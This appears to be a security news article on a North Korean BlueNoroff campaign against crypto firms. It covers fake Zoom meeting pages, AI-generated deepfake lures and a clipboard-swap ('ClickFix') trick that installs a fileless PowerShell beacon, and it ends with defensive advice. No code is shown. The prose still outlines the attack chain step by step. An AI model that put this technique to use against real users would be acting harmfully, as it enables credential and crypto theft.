BlueNoroff Uses Fileless PowerShell, AI Zoom Lures in New Campaign
Key Takeaways North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries. The attack chain leverages...
Key Takeaways
- North Korea’s BlueNoroff (APT38) group is executing a sophisticated phishing campaign targeting Web3 and cryptocurrency firms across over 20 countries.
- The attack chain leverages AI-generated Zoom lures and a unique “ClickFix” clipboard injection technique to deploy fileless PowerShell malware.
- Victims, often C-level executives, face rapid system compromise, persistent access for months, and exfiltration of sensitive data, including browser credentials and webcam footage used for future deepfake lures.
North Korea’s state-sponsored cybercrime syndicate, the Lazarus Group, has unleashed a new, highly effective campaign orchestrated by its financially motivated subgroup, BlueNoroff. This operation, detailed in a recent analysis by Arctic Wolf, employs advanced social engineering, AI-generated content, and fileless PowerShell techniques to infiltrate Web3 and cryptocurrency organizations globally. The United States accounts for a significant 41% of the identified victims in this widespread attack, which has impacted over 20 countries.
Table Of Content
Sophisticated Social Engineering and AI Lures
The attack sequence begins with a carefully crafted spear-phishing email. Threat actors impersonate legal professionals within the FinTech sector, sending Calendly invitations to their targets. Once a victim accepts the meeting, the malicious actor subtly replaces the legitimate Google Meet link with a typosquatted Zoom URL, meticulously designed to mimic an authentic meeting link.
When the unsuspecting victim clicks the fabricated link, their browser loads a self-contained HTML page. This page is an elaborate replica of a genuine Zoom meeting interface, complete with simulated participant video tiles, looping video footage, and a dynamic “active speaker” indicator. This deceptive environment is critical to the next stage of the attack.
Arctic Wolf analysts confirmed this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also known as APT38, Sapphire Sleet, and Stardust Chollima. The speed of the compromise is alarming, with researchers observing the full attack chain—from initial click to complete system compromise—concluding in under five minutes.
Post-compromise forensic analysis revealed that the attackers maintained persistent access on the victim’s device for 66 days. During this period, they exfiltrated critical data, including browser credentials, Telegram session data, and live webcam footage. This stolen webcam footage is then repurposed to create even more convincing lures for subsequent targets, fueling a self-reinforcing deepfake production pipeline.
Analysts discovered over 950 files on the attacker’s hosting server, comprising AI-generated headshot images – confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model – alongside genuine webcam footage from previous victims and composite deepfake videos. This continuous refinement of their deceptive tactics ensures that each successful attack improves the credibility of future social engineering attempts. BlueNoroff’s strategic focus is evident in its targeting: CEOs and founders constitute 45% of all identified victims, reflecting the group’s intent to gain direct access to cryptocurrency assets and wallet infrastructure.
The ClickFix Payload Delivery
Upon entering the fake Zoom meeting environment, victims encounter a persistent overlay message claiming their SDK is outdated and requires an update. This is the core of the “ClickFix” clipboard injection attack. The overlay presents what appear to be benign diagnostic commands, instructing the user to copy and paste them into the Windows Run dialog or terminal.
Crucially, as the victim copies these seemingly harmless commands, the malicious HTML page covertly replaces the clipboard content with a hidden PowerShell execution command. When the victim pastes and executes, they unwittingly trigger the malicious payload.
The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control (C2) server. This script is saved to the user’s Temp folder as “chromechip.log” and then executed in a hidden window. This initiates a persistent, fileless C2 beacon that operates entirely in memory, contacting the attacker every five seconds. The implant gathers extensive system data, including hostname, OS version, running processes, administrative privileges, and timezone information, packaging it into a structured JSON beacon for transmission to the remote server.
What You Should Do
- Verify Meeting Links: Always cross-reference meeting links through a secondary communication channel (e.g., a phone call or separate email) before joining any virtual call, especially for sensitive discussions.
- Beware of Software Update Prompts: Legitimate video conferencing platforms do not typically instruct users to run terminal commands to resolve audio or camera issues. Treat such prompts with extreme suspicion.
- Block C2 Infrastructure: Security teams should immediately block all identified command-and-control (C2) addresses associated with this campaign.
- Remove Persistence Mechanisms: Delete the Startup shortcut named “Chrome Update Certificated.lnk” and remove “chromechip.log” and “chrome-debug-data001.log” from affected devices.
- Rotate Credentials: Promptly rotate all browser-stored passwords, API keys, and cryptocurrency wallet credentials on any potentially compromised system.
- Enable PowerShell Script Block Logging: Implement PowerShell Script Block Logging on all endpoints to enhance the detection capabilities for obfuscated script execution, a key tactic in this campaign.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.